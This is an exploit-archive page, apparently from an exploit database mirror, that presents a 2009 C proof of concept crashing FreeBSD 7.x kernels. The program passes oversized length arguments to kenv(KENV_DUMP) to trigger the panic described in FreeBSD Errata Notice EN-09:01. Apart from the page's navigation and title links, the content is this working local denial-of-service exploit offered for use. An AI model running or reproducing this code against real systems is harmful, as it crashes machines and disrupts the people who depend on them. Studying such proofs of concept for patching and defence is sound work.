[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : FreeBSD 7.x (Dumping Environment) Local Kernel Panic Exploit
# Published : 2009-03-23
# Author : kokanin
# Previous Title : Microsoft GdiPlus EMF GpFont.SetData Integer Overflow PoC
# Next Title : Gigaset SE461 WiMAX router Remote Denial of Service Vulns


/* FreeBSD 7.x local kernel panic as mentioned in Errata Notice 09:01
http://security.freebsd.org/advisories/FreeBSD-EN-09:01.kenv.asc,
kokanin@gmail */
#include <kenv.h>
#include <stdio.h>
void main(){
kenv(KENV_DUMP,NULL,123123123,123123123);
}

// www.Syue.com [2009-03-23]